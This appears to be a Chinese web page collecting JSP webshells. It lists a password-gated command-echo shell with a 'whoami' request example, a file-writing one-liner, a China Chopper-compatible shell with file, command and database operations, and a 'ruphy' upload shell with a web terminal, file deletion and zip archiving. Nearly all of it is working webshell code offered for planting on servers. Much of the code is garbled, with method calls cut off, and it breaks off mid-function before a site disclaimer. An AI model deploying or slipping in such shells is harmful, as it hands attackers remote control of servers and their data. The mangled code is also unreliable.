⼀句话⽊马:JSP篇
JSP⼀句话收集:
1、带密码的回显cmd马
<% if("023".Parameter("pwd"))){ java.io.InputStream in = Runtime().Parameter("i")).getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print("<pre>"); while((ad(b))!=-1){ out 请求:/cmd.jsp??pwd=023&i=whoami
2、⼀句话
<%
Parameter("f")!=null)(new java.io.RealPath("\\")+Parameter("f"))).Parameter("t").getBytes());
%>
在浏览器地址栏输⼊192.168.125.138:8080/222.jsp?&t=hello123123
然后再输⼊127.0.0.1:8080/
3、jsp⼀句话,菜⼑可直连
<%@page import="java.io.*,java.util.*,java.*,java.sql.*,*"%>
<%!String Pwd = "pass";
String EC(String s, String c) throws Exception {
return s;
}//new Bytes("ISO-8859-1"),c);}
Connection GC(String s) throws Exception {
String[] x = s.trim().split("\r\n");
Class.forName(x[0].trim()).newInstance();
Connection c = Connection(x[1].trim());
if (x.length > 2) {
c.setCatalog(x[2].trim());
}
return c;
}
void AA(StringBuffer sb) throws Exception {
File r[] = File.listRoots();
for (int i = 0; i < r.length; i++) {
sb.append(r[i].toString().substring(0, 2));
}
}
void BB(String s, StringBuffer sb) throws Exception {
File oF = new File(s), l[] = oF.listFiles();
String sT, sQ, sF = "";
java.util.Date dt;
SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
for (int i = 0; i < l.length; i++) {
dt = new java.util.Date(l[i].lastModified());
sT = fm.format(dt);
sQ = l[i].canRead() ? "R" : "";
sQ += l[i].canWrite() ? " W" : "";
if (l[i].isDirectory()) {
sb.append(l[i].getName() + "/\t" + sT + "\t" + l[i].length()
+ "\t" + sQ + "\n");
} else {
sF += l[i].getName() + "\t" + sT + "\t" + l[i].length() + "\t"
+ sQ + "\n";
}
}
sb.append(sF);
}
void EE(String s) throws Exception {
File f = new File(s);
if (f.isDirectory()) {
File x[] = f.listFiles();
for (int k = 0; k < x.length; k++) {
if (!x[k].delete()) {
EE(x[k].getPath());
}
}
}
f.delete();
}
void FF(String s, HttpServletResponse r) throws Exception {
int n;
byte[] b = new byte[512];
ServletOutputStream os = r.getOutputStream();
BufferedInputStream is = new BufferedInputStream(new FileInputStream(s));
os.write(("->" + "|").getBytes(), 0, 3);
while ((n = is.read(b, 0, 512)) != -1) {
os.write(b, 0, n);
}
os.write(("|" + "<-").getBytes(), 0, 3);
os.close();
is.close();
}
void GG(String s, String d) throws Exception {
String h = "0123456789ABCDEF";
int n;
File f = new File(s);
FileOutputStream os = new FileOutputStream(f);
for (int i = 0; i < d.length(); i += 2) {
os
.write((h.indexOf(d.charAt(i)) << 4 | h.indexOf(d
.charAt(i + 1))));
}
os.close();
}
void HH(String s, String d) throws Exception {
File sf = new File(s), df = new File(d);
if (sf.isDirectory()) {
if (!df.exists()) {
df.mkdir();
}
File z[] = sf.listFiles();
for (int j = 0; j < z.length; j++) {
HH(s + "/" + z[j].getName(), d + "/" + z[j].getName());
}
} else {
FileInputStream is = new FileInputStream(sf);
FileOutputStream os = new FileOutputStream(df);
int n;
byte[] b = new byte[512];
while ((n = is.read(b, 0, 512)) != -1) {
os.write(b, 0, n);
}
is.close();
os.close();
}
}
void II(String s, String d) throws Exception {
File sf = new File(s), df = new File(d);
}
void JJ(String s) throws Exception {
File f = new File(s);
f.mkdir();
}
void KK(String s, String t) throws Exception {
File f = new File(s);
SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");        java.util.Date dt = fm.parse(t);
f.Time());
}
void LL(String s, String d) throws Exception {
URL u = new URL(s);
int n;
FileOutputStream os = new FileOutputStream(d);
HttpURLConnection h = (HttpURLConnection) u.openConnection();
InputStream is = h.getInputStream();
byte[] b = new byte[512];
while ((n = is.read(b, 0, 512)) != -1) {
os.write(b, 0, n);
}
os.close();
is.close();
h.disconnect();
}
void MM(InputStream is, StringBuffer sb) throws Exception {
String l;
BufferedReader br = new BufferedReader(new InputStreamReader(is));
while ((l = br.readLine()) != null) {
sb.append(l + "\r\n");
}
}
void NN(String s, StringBuffer sb) throws Exception {
Connection c = GC(s);
ResultSet r = c.getMetaData().getCatalogs();
while (r.next()) {
sb.String(1) + "\t");
}
r.close();
c.close();
}
void OO(String s, StringBuffer sb) throws Exception {
Connection c = GC(s);
String[] t = { "TABLE" };
ResultSet r = c.getMetaData().getTables(null, null, "%", t);
while (r.next()) {
sb.String("TABLE_NAME") + "\t");
}
r.close();
c.close();
}
void PP(String s, StringBuffer sb) throws Exception {
String[] x = s.trim().split("\r\n");
Connection c = GC(s);
Statement m = c.createStatement(1005, 1007);
ResultSet r = m.executeQuery("select * from " + x[3]);
ResultSetMetaData d = r.getMetaData();
for (int i = 1; i <= d.getColumnCount(); i++) {
sb.ColumnName(i) + " (" + d.getColumnTypeName(i)
+ ")\t");
}
r.close();
m.close();
c.close();
}
void QQ(String cs, String s, String q, StringBuffer sb) throws Exception {
int i;
Connection c = GC(s);
Statement m = c.createStatement(1005, 1008);
try {
ResultSet r = m.executeQuery(q);
ResultSetMetaData d = r.getMetaData();
int n = d.getColumnCount();
for (i = 1; i <= n; i++) {
sb.ColumnName(i) + "\t|\t");
}
sb.append("\r\n");
while (r.next()) {
for (i = 1; i <= n; i++) {
sb.append(String(i), cs) + "\t|\t");
}
sb.append("\r\n");
}
r.close();
} catch (Exception e) {
sb.append("Result\t|\t\r\n");
try {
sb.append("Execute Successfully!\t|\t\r\n");
} catch (Exception ee) {
sb.String() + "\t|\t\r\n");
}
}
m.close();
c.close();
}%>
<%
String cs = Parameter("z0")==null?"gbk": Parameter("z0") + "";    request.setCharacterEncoding(cs);
response.setContentType("text/html;charset=" + cs);
String Z = Parameter(Pwd) + "", cs);
String z1 = Parameter("z1") + "", cs);
String z2 = Parameter("z2") + "", cs);
StringBuffer sb = new StringBuffer("");
try {
sb.append("->" + "|");
if (Z.equals("A")) {
String s = new RealPath(request
.getRequestURI())).getParent();
sb.append(s + "\t");
if (!s.substring(0, 1).equals("/")) {
AA(sb);
}
} else if (Z.equals("B")) {
BB(z1, sb);
} else if (Z.equals("C")) {
String l = "";
BufferedReader br = new BufferedReader(
new InputStreamReader(new FileInputStream(new File(
z1))));
while ((l = br.readLine()) != null) {
sb.append(l + "\r\n");
}
br.close();
} else if (Z.equals("D")) {
BufferedWriter bw = new BufferedWriter(
new OutputStreamWriter(new FileOutputStream(
new File(z1))));
bw.write(z2);
bw.close();
sb.append("1");
} else if (Z.equals("E")) {
EE(z1);
sb.append("1");
} else if (Z.equals("F")) {
FF(z1, response);
} else if (Z.equals("G")) {
GG(z1, z2);
sb.append("1");
} else if (Z.equals("H")) {
HH(z1, z2);
sb.append("1");
} else if (Z.equals("I")) {
II(z1, z2);
sb.append("1");
} else if (Z.equals("J")) {
JJ(z1);
sb.append("1");
} else if (Z.equals("K")) {
KK(z1, z2);
sb.append("1");
} else if (Z.equals("L")) {
LL(z1, z2);
sb.append("1");
} else if (Z.equals("M")) {
String[] c = { z1.substring(2), z1.substring(0, 2), z2 };
Process p = Runtime().exec(c);
InputStream(), sb);
ErrorStream(), sb);
} else if (Z.equals("N")) {
NN(z1, sb);
} else if (Z.equals("O")) {
OO(z1, sb);
} else if (Z.equals("P")) {
PP(z1, sb);
} else if (Z.equals("Q")) {
QQ(cs, z1, z2, sb);
}
} catch (Exception e) {
sb.append("ERROR" + ":// " + e.toString());
}
sb.append("|" + "<-");
out.String());
%>
View Code
4、⼩马,上传
?p=ruphy&f=
<%@page import="java.io.*" contentType="text/html; charset=UTF-8" %>
<%@page import="java.util.zip.*" contentType="text/html; charset=UTF-8" %>
<%@page import="java.util.*" contentType="text/html; charset=UTF-8" %>
<%@page import="java.lang.StringBuilder" contentType="text/html; charset=UTF-8" %> <%@page import="java.URLDecoder" contentType="text/html; charset=UTF-8" %> <%!
void recursionZip(ZipOutputStream zipOut, File file, String baseDir) throws Exception { if (file.isDirectory()) {
File[] files = file.listFiles();
for (File fileSec : files) {
recursionZip(zipOut, fileSec, baseDir + Name() + File.separator);
}
} else {
byte[] buf = new byte[1024];
InputStream input = new FileInputStream(file);
zipOut.putNextEntry(new ZipEntry(baseDir + Name()));
System.out.println(file + "压缩成功!");
int len;
while ((len = ad(buf)) != -1) {
zipOut.write(buf, 0, len);
}
input.close();
}
}
boolean zip(String filepath, String zipPath) {
try {
File file = new File(filepath);// 要被压缩的⽂件夹
File zipFile = new File(zipPath);
ZipOutputStream zipOut = new ZipOutputStream(new FileOutputStream(zipFile));
if (file.isDirectory()) {
File[] files = file.listFiles();
for (File fileSec : files) {
if (!AbsolutePath().AbsolutePath()))
recursionZip(zipOut, fileSec, Name() + File.separator);
}
} else {
recursionZip(zipOut, file, "");
}
zipOut.close();
} catch (Exception e) {
return false;
}
return true;
}
void copyStream(final InputStream[] ins, final JspWriter out) {
for (final InputStream in : ins) {
new Thread(new Runnable() {
// @Override  不兼容低版本
public void run() {
if (in == null) return;
try {
int a = -1;
byte[] b = new byte[2048];
while ((a = in.read(b)) != -1) {
out.println(new String(b));
}
} catch (Exception e) {
} finally {
try {
if (in != null) in.close();
} catch (Exception ec) {
}
java和jsp}
}
}).start();
}
}
String uploadFile(DataInputStream is, String path, int size, String sp) throws IOException {
if (size > 20 * 1024 * 1024) {
return"上传失败,⽂件太⼤!";
}
byte bts[] = new byte[size];
int br = 0;
int tbr = 0;
//上传的数据保存在byte数组⾥⾯
while (tbr < size) {
br = is.read(bts, tbr, size);
tbr += br;
}
String file = new String(bts, "utf-8");
String sf = file.substring(file.indexOf("filename=\"") + 10);
sf = sf.substring(0, sf.indexOf("\n")).replaceAll("/\\+", "/");
sf = sf.substring(sf.lastIndexOf("/") + 1, sf.indexOf("\""));
String fileName = path + "/" + sf;
int pos;
pos = file.indexOf("filename = \"");
pos = file.indexOf("\n", pos) + 1;
pos = file.indexOf("\n", pos) + 1;
pos = file.indexOf("\n", pos) + 1;
int bl = file.indexOf(sp, pos) - 4;
/
/取得⽂件数据的开始的位置
int startPos = ((file.substring(0, pos)).getBytes()).length;
int endPos = ((file.substring(0, bl)).getBytes()).length;
File checkFile = new File(fileName);
if (ists()) {
checkFile.delete();
}
FileOutputStream fileOut = new FileOutputStream(fileName);
fileOut.write(bts, startPos, (endPos - startPos));
fileOut.close();
return sf + "⽂件上传成功!";
}
String getCurrentPath(String file, String p, String url) throws IOException {
String path = "";
String tmpFile = placeAll("/[^/]+/?$", "/");
while (!file.equals(tmpFile)) {
path = "<a href='" + url + "?p=" + p + "&f=" + file + "'>" + placeAll(tmpFile, "") + "</a>" + path;
file = tmpFile;
tmpFile = placeAll("/[^/]+/?$", "/");
}
path = "<a href='" + url + "?p=" + p + "&f=" + file + "'>" + file + "</a>" + path;
return path;
}
%>
<%
//验证⽤户名
String dp = "ruphy";
response.setCharacterEncoding("UTF-8");
String url = RequestURL().toString();
String p = Parameter("p");
if (!dp.equals(p)) {
if (!"true".Parameter("c"))) {
out.println("<div style='text-align: center;'>访问失败!<span style='color: red'>密码错误!</span></div>");
out.println("<div style='text-align: center;'><span>usage: <a style='color: black' href='" + url + "?p=passwd&f=path' >" + url + "?p=passwd&f=path</a></span></div>");
out.println("<div style='text-align: center; color: blue'>@copyright by ruphy.</div>");
}
return;
}
String m = Parameter("m");
if (m != null && !"".im())) {
out.println("开始执⾏命令: " + m);
out.flush();
String[] cmds = new String[]{"sh", "-c", m};
if (Property("os.name").toLowerCase().contains("windows")) {
cmds = new String[]{"cmd", "/k", m};
}
Process ps = null;
out.print("<xmp>");
try {
ps = Runtime().exec(cmds);
copyStream(new InputStream[]{ps.getInputStream(), ps.getErrorStream()}, out);
ps.waitFor();
} catch (Exception e) {
out.println("<div>执⾏命令 " + m + " 发⽣错误!</div>");
} finally {
try {
if (ps != null) ps.destroy();
} catch (Exception ec) {
out.println("关闭流出错!");
}
}
out.println("</xmp>");
out.println("<div>执⾏命令: " + m + " 完成!</div>");
return;
}
String fn = Parameter("f");
if (fn == null || "".im())) {
fn = RealPath("/");
}
String f = fn.replaceAll("\\\\+", "/").replaceAll("/+", "/");
String ct = ContentType();
if (ct != null && ct.indexOf("multipart/form-data") >= 0) {
DataInputStream is = new InputStream());
String msg = uploadFile(is, f, ContentLength(), ct.substring(ct.lastIndexOf("=") + 1, ct.length()));
out.println("<script>alert('" + msg + "');location.href='" + url + "?p=" + dp + "&f=" + f + "';</script>");
return;
}
File file = new File(f);
if (!ists()) {
out.println("<script>alert('输⼊⽬录或者⽂件不存在!')</script>");
}
if ("true".Parameter("t")) && ists()) {
if (zip(f, new File(f).getAbsolutePath() + ".zip")) {
out.println("<script>alert('压缩成功!');location.href=place(\"&t=true\", \"\").replace(/\\/[^\\/]+$/, '');</script>");
}
out.println("<script>alert('压缩失败');location.href=place(\"&t=true\", \"\").replace(/\\/[^\\/]+$/, '');</script>");
return;
}
if (file.isDirectory() && file.canRead()) {
StringBuilder sb = new StringBuilder();
File[] files = File.listRoots();
String roots = "";
for (int i = 0; i < files.length; i++) {
roots += "<a style=\"margin-left: 10px;\" href=\"" + url + "?p=" + dp + "&f=" + files[i].getPath().replaceAll("\\\\+", "/") + "/\">" + files[i].getPath() + "</a>";
}
sb.append("<div><div>");
sb.append("<div style='margin: 10px 0 0 20px'><form action=" + url + "?p=" + dp + "&f=" + f + " method='post' enctype='multipart/form-data'>⽂件上传: <input name='fileName' type='file'><input onclick='return confirm(\"上传到当前⽬录:
sb.append("</div><div style='margin: 5px 0 20px 20px'><span>根⽬录:" + roots + "</span><span style=\"margin-left: 20px;\">当前⽬录:" + getCurrentPath(f, dp, url) + "</span>"
+ "<span style=\"margin-left: 20px;\" ><a href=\"" + url + "?p=" + dp + "&f=" + f.replaceAll("/[^/]+/?$", "/") + "\">返回上级⽬录</a></span>"
+ "</div>");
sb.append("<div style='max-height: 400px; overflow: auto; background-color: #ffe;'><table><tbody>");
files = file.listFiles();
for (int i = 0; i < files.length; i++) {
if (files[i].canRead()) {
sb.append("<tr>"
+ "<td><a style=\"margin-left: 20px;\" href='" + url + "?p=" + dp + "&f=" + f + "/" + files[i].getName() + "'>" + files[i].getName() + "</a></td>"
+ "<td><a style=\"margin-left: 20px;\" onclick='return confirm(\"确定删除吗?\")' href=\"" + url + "?p=" + dp + "&r=true&f=" + f + "/" + files[i].getName() + "\">删除</a></td>"
+ (!files[i].isFile() ? "<td></td>" : "<td><a style=\"margin-left: 20px;\" onclick=\"ElementById('view-file').setAttribute('src', '" + url + "?p=ruphy&v=true&w=true&f=" + f + "/" + files[i].getName() + "');\" href=\"#\">查                        + "<td><a style=\"margin-left: 20px;\" href=\"" + url + "?p=" + dp + "&t=true&f=" + f + "/" + files[i].getName() + "\">压缩</a>"
+ "<span style=\"margin-left: 20px\">" + files[i].length() / 1024 + "KB(" + files[i].length() / 1024 / 1024 + "MB)</span></td>"
+ "</tr>");
}
}
sb.append("</tbody></table></div></div>");
sb.append("<div style='background-color: #ccc;'>");
sb.append("<div style='margin: 20px'>虚拟终端:<input id='command' type='text' value='netstat -an' style='width: 250px;border: none;color: red;background-color: black;'/>"
+ "<a style='color: blue' onclick=\"var m= ElementById('command').value;if(!m) return false; ElementById('view-file').setAttribute('src', '" + url + "?p=ruphy&m=' + encodeURIComponent(m));\" href=\"#\                + "</div>");
sb.append("<div style='margin-top: 20px; padding: 5px; height: 600px;max-height: 100%'>"
+ "<iframe id='view-file' src='" + url + "?c=true' height='100%' style='width: 100%; height: 100%' frameborder='0'></iframe>"
+ "</div>");
sb.append("</div>");
out.String());
out.println("<div><div style='text-align: center;'><span>usage: <a style='color: black' href='" + url + "' >" + url + "?p=passwd</a></span></div>");
out.println("<div style='text-align: center; color: blue'>@copyright by ruphy.</div></div>");
sb.append("</div>");
return;
}
if ("true".Parameter("r"))) {
if (file.delete()) {
out.println("<script>alert('删除成功!');location.href=place(\"&r=true\", \"\").replace(/\\/[^\\/]+$/, '');</script>");
}
out.println("<script>alert('删除失败!');location.href=place(\"&r=true\", \"\").replace(/\\/[^\\/]+$/, '');</script>");
return;
}
if (!"true".Parameter("v"))) {
response.setContentType("application/octet-stream");
response.setHeader("Content-Disposition", "attachment; filename=" + f.replaceAll(".+/+", "").replace("", "_"));
} else if (file.length() > 1024 * 1024 * 10) {
out.println("⽂件太⼤,请下载查看!");
return;
}
String ctt = java.nio.file.Files.Path());
ctt = ctt == null ? "others" : placeAll("\\/+.*", "");
if ("true".Parameter("w"))) {
String u = url + "?p=ruphy&v=true&l=true&f=" + f;
if ("video".equals(ctt)) {
out.println("<div style='width: 800px'><video style='margin-top: 5px; width: 100%' controls=\"controls\" autoplay=\"autoplay\" src='" + u + "' /></div>");
return;
}
if ("audio".equals(ctt)) {
out.println("<div style='width: 300px'><audio style='width: 100%' controls=\"controls\" autoplay=\"autoplay\" src='" + u + "' /></div>");
return;
}
if ("image".equals(ctt)) {
out.println("<div style='width: 600px'><img style='margin-top: 5px; width:100%;' alt='⾮图⽚' src='" + u + "'/></div>");
return;
}
}
if ("true".Parameter("l"))) {
OutputStream streamOut = OutputStream();
InputStream streamIn = new FileInputStream(file);
int length = streamIn.available();
int bytesRead = 0;

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。